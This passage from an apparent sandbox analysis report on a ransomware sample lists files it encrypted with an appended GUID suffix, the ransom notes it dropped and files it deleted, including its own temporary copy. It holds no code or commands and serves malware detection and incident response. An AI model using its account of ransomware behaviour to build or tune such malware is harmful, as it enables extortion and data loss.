1200 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties",
1201 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1202 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif",
1203 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1204 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif",
1205 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1206 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif",
1207 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1208 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif",
1209 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1210 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar",
1211 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1212 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1213 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar",
1214 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1215 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar",
1216 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1217 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar",
1218 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1219 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar",
1220 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1221 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar",
1222 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1223 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index",
1224 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index.875B149F-7E2C-F9D8-914C-24C48737255D",
1225 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar",
1226 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1227 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar",
1228 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1229 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar",
1230 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1231 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar",
1232 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1233 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar",
1234 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1235 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar",
1236 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1237 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf",
1238 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1239 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1240 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf",
1241 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1242 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf",
1243 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1244 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf",
1245 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1246 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf",
1247 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1248 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf",
1249 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1250 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf",
1251 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1252 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf",
1253 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf.875B149F-7E2C-F9D8-914C-24C48737255D",
1254 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties",
1255 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1256 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1257 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif",
1258 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1259 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif",
1260 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1261 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif",
1262 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1263 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif",
1264 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1265 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif",
1266 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1267 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif",
1268 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1269 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif",
1270 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif.875B149F-7E2C-F9D8-914C-24C48737255D",
1271 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc",
1272 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1273 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1274 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc",
1275 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc.875B149F-7E2C-F9D8-914C-24C48737255D",
1276 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access",
1277 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access.875B149F-7E2C-F9D8-914C-24C48737255D",
1278 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1279 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template",
1280 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template.875B149F-7E2C-F9D8-914C-24C48737255D",
1281 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties",
1282 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties.875B149F-7E2C-F9D8-914C-24C48737255D",
1283 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template",
1284 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template.875B149F-7E2C-F9D8-914C-24C48737255D",
1285 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist",
1286 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist.875B149F-7E2C-F9D8-914C-24C48737255D",
1287 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1288 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs",
1289 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs.875B149F-7E2C-F9D8-914C-24C48737255D",
1290 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts",
1291 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts.875B149F-7E2C-F9D8-914C-24C48737255D",
1292 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy",
1293 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy.875B149F-7E2C-F9D8-914C-24C48737255D",
1294 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security",
1295 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.security.875B149F-7E2C-F9D8-914C-24C48737255D",
1296 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy",
1297 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\javaws.policy.875B149F-7E2C-F9D8-914C-24C48737255D",
1298 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\trusted.libraries",
1299 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar",
1300 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\local_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1301 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1302 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar",
1303 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\limited\\US_export_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1304 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar",
1305 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\local_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1306 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1307 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar",
1308 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\policy\\unlimited\\US_export_policy.jar.875B149F-7E2C-F9D8-914C-24C48737255D",
1309 "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc",
1310 "C:\\Program Files\\Microsoft Office\\Office15\\Custom.propdesc.875B149F-7E2C-F9D8-914C-24C48737255D",
1311 "C:\\Program Files\\Microsoft Office\\Office15\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1312 "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt",
1313 "C:\\Program Files\\Microsoft Office\\Office15\\Mso Example Setup File A.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1314 "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc",
1315 "C:\\Program Files\\Microsoft Office\\Office15\\VisioCustom.propdesc.875B149F-7E2C-F9D8-914C-24C48737255D",
1316 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt",
1317 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File A.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1318 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1319 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt",
1320 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\Mso Example Intl Setup File B.txt.875B149F-7E2C-F9D8-914C-24C48737255D",
1321 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml",
1322 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentfallback.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1323 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml",
1324 "C:\\Program Files\\Microsoft Office\\Office15\\1033\\officeinventoryagentlogon.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1325 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf",
1326 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnms006.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1327 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1328 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat",
1329 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1330 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat",
1331 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.cat.875B149F-7E2C-F9D8-914C-24C48737255D",
1332 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf",
1333 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\prnSendToOneNote15_win7.inf.875B149F-7E2C-F9D8-914C-24C48737255D",
1334 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini",
1335 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-manifest.ini.875B149F-7E2C-F9D8-914C-24C48737255D",
1336 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml",
1337 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote-PipelineConfig.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1338 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd",
1339 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.gpd.875B149F-7E2C-F9D8-914C-24C48737255D",
1340 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini",
1341 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNote.ini.875B149F-7E2C-F9D8-914C-24C48737255D",
1342 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd",
1343 "C:\\Program Files\\Microsoft Office\\Office15\\OneNote\\SendToOneNoteNames.gpd.875B149F-7E2C-F9D8-914C-24C48737255D",
1344 "C:\\Program Files\\Notepad++\\contextMenu.xml",
1345 "C:\\Program Files\\Notepad++\\contextMenu.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1346 "C:\\Program Files\\Notepad++\\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT",
1347 "C:\\Program Files\\Notepad++\\functionList.xml",
1348 "C:\\Program Files\\Notepad++\\functionList.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1349 "C:\\Program Files\\Notepad++\\langs.model.xml",
1350 "C:\\Program Files\\Notepad++\\langs.model.xml.875B149F-7E2C-F9D8-914C-24C48737255D",
1351 "C:\\Program Files\\Notepad++\\LICENSE",
1352 "C:\\Program Files\\Notepad++\\LICENSE.875B149F-7E2C-F9D8-914C-24C48737255D"
1353
1354
1355* Deleted Files (note: the originals of the files listed above are removed after an encrypted copy with the appended ".875B149F-7E2C-F9D8-914C-24C48737255D" suffix has been written, so recovery depends on backups/shadow copies rather than on undelete; the sample's own %TEMP% copy "OQyoOv9HxQ.exe" and its two ".buran" scratch files are also removed, i.e. the dropper appears to clean up after itself):
1356 "C:\\Users\\user\\AppData\\Local\\Temp\\344AA25B.buran",
1357 "C:\\Users\\user\\AppData\\Local\\Temp\\4500E6C1.buran",
1358 "C:\\Users\\user\\AppData\\Local\\Temp\\OQyoOv9HxQ.exe",
1359 "C:\\Windows\\SoftwareDistribution\\DataStore\\Logs\\edbtmp.log",
1360 "C:\\.doc",
1361 "C:\\.htm",
1362 "C:\\.jpeg",
1363 "C:\\.jpg",
1364 "C:\\.pptx",
1365 "C:\\.txt",
1366 "C:\\.xls",
1367 "C:\\Host.bmp",
1368 "C:\\Host.docx",
1369 "C:\\Host.html",
1370 "C:\\Host.jpeg",
1371 "C:\\Host.jpg",
1372 "C:\\Host.pdf",
1373 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\iexplore.ico",
1374 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\Oracle VM VirtualBox Guest Additions.url",
1375 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.cat",
1376 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxGuest.inf",
1377 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.cat",
1378 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxMouse.inf",
1379 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.cat",
1380 "C:\\Program Files\\BLAOracle\\VirtualBox Guest Additions\\VBoxVideo.inf",
1381 "C:\\Program Files\\Java\\jre1.8.0_201\\COPYRIGHT",
1382 "C:\\Program Files\\Java\\jre1.8.0_201\\LICENSE",
1383 "C:\\Program Files\\Java\\jre1.8.0_201\\README.txt",
1384 "C:\\Program Files\\Java\\jre1.8.0_201\\release",
1385 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME-JAVAFX.txt",
1386 "C:\\Program Files\\Java\\jre1.8.0_201\\THIRDPARTYLICENSEREADME.txt",
1387 "C:\\Program Files\\Java\\jre1.8.0_201\\Welcome.html",
1388 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\classes.jsa",
1389 "C:\\Program Files\\Java\\jre1.8.0_201\\bin\\server\\Xusage.txt",
1390 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\accessibility.properties",
1391 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\calendars.properties",
1392 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\charsets.jar",
1393 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\classlist",
1394 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\content-types.properties",
1395 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\currency.data",
1396 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy.jar",
1397 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\flavormap.properties",
1398 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.bfc",
1399 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fontconfig.properties.src",
1400 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\hijrah-config-umalqura.properties",
1401 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javafx.properties",
1402 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\javaws.jar",
1403 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jce.jar",
1404 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr.jar",
1405 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfxswt.jar",
1406 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jsse.jar",
1407 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jvm.hprof.txt",
1408 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\logging.properties",
1409 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management-agent.jar",
1410 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\meta-index",
1411 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\net.properties",
1412 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\plugin.jar",
1413 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfont.properties.ja",
1414 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\psfontj2d.properties",
1415 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\resources.jar",
1416 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\rt.jar",
1417 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\sound.properties",
1418 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzdb.dat",
1419 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\tzmappings",
1420 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\amd64\\jvm.cfg",
1421 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\CIEXYZ.pf",
1422 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\GRAY.pf",
1423 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\LINEAR_RGB.pf",
1424 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\PYCC.pf",
1425 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\cmm\\sRGB.pf",
1426 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\ffjcext.zip",
1427 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages.properties",
1428 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_de.properties",
1429 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_es.properties",
1430 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_fr.properties",
1431 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_it.properties",
1432 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ja.properties",
1433 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_ko.properties",
1434 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_pt_BR.properties",
1435 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_sv.properties",
1436 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_CN.properties",
1437 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_HK.properties",
1438 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\messages_zh_TW.properties",
1439 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash.gif",
1440 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash@2x.gif",
1441 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11-lic.gif",
1442 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\deploy\\splash_11@2x-lic.gif",
1443 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\access-bridge-64.jar",
1444 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\cldrdata.jar",
1445 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\dnsns.jar",
1446 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jaccess.jar",
1447 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\jfxrt.jar",
1448 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\localedata.jar",
1449 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\meta-index",
1450 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\nashorn.jar",
1451 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunec.jar",
1452 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunjce_provider.jar",
1453 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunmscapi.jar",
1454 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\sunpkcs11.jar",
1455 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\ext\\zipfs.jar",
1456 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiBold.ttf",
1457 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightDemiItalic.ttf",
1458 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightItalic.ttf",
1459 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaBrightRegular.ttf",
1460 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansDemiBold.ttf",
1461 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaSansRegular.ttf",
1462 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterBold.ttf",
1463 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\fonts\\LucidaTypewriterRegular.ttf",
1464 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\cursors.properties",
1465 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\invalid32x32.gif",
1466 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyDrop32x32.gif",
1467 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif",
1468 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkDrop32x32.gif",
1469 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif",
1470 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveDrop32x32.gif",
1471 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif",
1472 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\default.jfc",
1473 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\jfr\\profile.jfc",
1474 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.access",
1475 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\jmxremote.password.template",
1476 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\management.properties",
1477 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\management\\snmp.acl.template",
1478 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklist",
1479 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\blacklisted.certs",
1480 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\cacerts",
1481 "C:\\Program Files\\Java\\jre1.8.0_201\\lib\\security\\java.policy",
